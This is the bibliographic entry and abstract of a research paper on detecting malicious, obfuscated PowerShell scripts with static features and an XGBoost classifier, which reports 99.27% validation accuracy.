Machine Learning Approaches to Malicious PowerShell Scripts Detection and Feature Combination Analysis

Hsiang-Hua Hung Hsiang-Hua Hung,Yi-Wei Ma Jiann-Liang Chen,Jiann-Liang Chen Hsiang-Hua Hung

doi:10.53106/160792642024012501014

Abstract

<p>With advances in communication technology, modern society relies more than ever on the Internet and various user-friendly digital tools. It provides access to and enables the manipulation of files, trips, and the Windows API. Attackers frequently use various obfuscation techniques PowerShell scripts to avoid detection by anti-virus software. Their doing so can significantly reduce the readability of the script. This work statically analyzes PowerShell scripts. Thirty-three features that were based on the script&rsquo;s keywords, format, and string combinations were used herein to determine the behavioral intent of the script. Ones are characteristic-based features that are obtained by calculation; the others are behavior-based features that determine the execution function of behavior using keywords and instructions. Behavior-based features can be divided into positive behavior-based features, neutral behavior-based features, and negative behavior-based features. These three types of features are enhanced by observing samples and adding keywords. The other type of characteristic-based feature is introduced into the formula from other studies in this work. The XGBoost model was used to evaluate the importance of the features that are proposed in this study and to identify the combination of features that contributed most to the detection of PowerShell scripts. The final model with the combined features is found to exhibit the best performance. The model has 99.27% accuracy when applied to the validation dataset. The results clearly indicate that the proposed malicious PowerShell script detection model outperforms previously developed models.</p> <p>&nbsp;</p>

Full Text